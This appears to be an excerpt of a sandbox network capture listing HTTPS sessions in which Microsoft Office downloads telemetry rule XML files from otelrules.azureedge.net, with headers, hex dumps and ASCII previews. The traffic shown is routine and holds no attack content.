                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                          ETag: "0x8DC582BE1223606"
                                                                                                                                                                          x-ms-request-id: 6d656984-c01e-008d-0d1b-3d2eec000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180211Z-178bfbc474btvfdfhC1NYCa2en00000004v000000000ca1g
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:12 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          111192.168.2.54988913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:11 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:12 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1401
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                          ETag: "0x8DC582BE055B528"
                                                                                                                                                                          x-ms-request-id: 3272c5ec-601e-003d-7d76-3b6f25000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180212Z-174c587ffdfb74xqhC1TEBhabc000000036g00000000kbtu
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:12 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          112192.168.2.54989713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:14 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:14 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1360
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                          ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                          x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180214Z-178bfbc474btrnf9hC1NYCb80g0000000520000000000y6g
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:14 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          113192.168.2.54989813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:14 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:14 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                          ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                          x-ms-request-id: f30e7def-101e-0065-0967-3d4088000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180214Z-178bfbc474bh5zbqhC1NYCkdug00000004p000000000gv9k
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          114192.168.2.54989613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:14 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:14 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1397
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                          ETag: "0x8DC582BE7262739"
                                                                                                                                                                          x-ms-request-id: e297a76c-801e-0083-6c67-3df0ae000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180214Z-15b8b599d88hr8sfhC1TEBbca40000000370000000005ext
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:14 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          115192.168.2.54989913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:14 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:14 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:14 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                          ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                          x-ms-request-id: 8f21b959-301e-0096-6e6c-3de71d000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180214Z-15b8b599d88g5tp8hC1TEByx6w000000034000000000n3ww
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          116192.168.2.54990213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:14 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:14 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1397
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                          ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                          x-ms-request-id: c49a2be7-d01e-005a-3155-3c7fd9000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180214Z-15b8b599d889gj5whC1TEBfyk0000000033000000000bv5t
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:14 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          117192.168.2.54991013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:16 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:16 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1360
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                          ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                          x-ms-request-id: 38659630-901e-008f-15a0-3b67a6000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180216Z-15b8b599d88pxmdghC1TEBux9c00000003eg000000005mfy
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:16 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          118192.168.2.54991213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:16 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:16 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1427
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                          ETag: "0x8DC582BE56F6873"
                                                                                                                                                                          x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180216Z-178bfbc474brk967hC1NYCfu6000000004q0000000002t1a
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:16 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          119192.168.2.54991413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:16 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:16 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1390
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                          ETag: "0x8DC582BE3002601"
                                                                                                                                                                          x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180216Z-15b8b599d886w4hzhC1TEBb4ug000000037000000000mp9c
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:17 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


